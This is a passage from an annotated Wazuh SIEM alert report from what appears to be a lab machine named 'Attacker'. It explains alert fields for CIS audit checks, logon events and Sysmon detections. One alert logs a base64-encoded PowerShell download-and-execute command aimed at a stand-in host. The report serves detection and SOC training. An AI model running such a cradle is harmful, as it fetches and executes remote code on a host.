How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534437.2110662
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26162
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Authentication Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in authentication policy. Events for this subcategory include: - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4713: Kerberos policy was changed. - 4716: Trusted domain information was modified. - 4717: System security access was granted to an account. - 4718: System security access was removed from an account. - 4739: Domain Policy was changed. - 4864: A namespace collision was detected. - 4865: A trusted forest information entry was added. - 4866: A trusted forest information entry was removed. - 4867: A trusted forest information entry was modified. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authentication Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Authentication Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Authentication Policy Change"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  passed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:38.625+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:38.625+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  112
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534438.2114357
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:36.5211059Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  286074
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:35.479 ProcessGuid: {94294ddc-bde3-680a-db0b-000000000e00} ProcessId: 6708 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bde0-680a-d80b-000000000e00} ParentProcessId: 2532 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:35.479
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bde3-680a-db0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6708
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bde0-680a-d80b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2532
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:38.629+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:38.629+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  116
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534438.2122420
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:36.7393600Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  286075
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:36.716 ProcessGuid: {94294ddc-bde3-680a-db0b-000000000e00} ProcessId: 6708 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_incsmgqj.jzi.ps1 CreationUtcTime: 2025-04-24 22:40:36.716 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:36.716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bde3-680a-db0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6708
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_incsmgqj.jzi.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:36.716
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:08.577+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:08.577+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Authorization Policy Change' is set to include 'Success'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.3']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534468.2125185
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26163
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Authorization Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in authorization policy. Events for this subcategory include: - 4704: A user right was assigned. - 4705: A user right was removed. - 4706: A new trust was created to a domain. - 4707: A trust to a domain was removed. - 4714: Encrypted data recovery policy was changed. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Authorization Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Authorization Policy Change"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:41:32.835+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:41:32.835+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  59
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534492.2128210
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:41:27.0967356Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43893
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
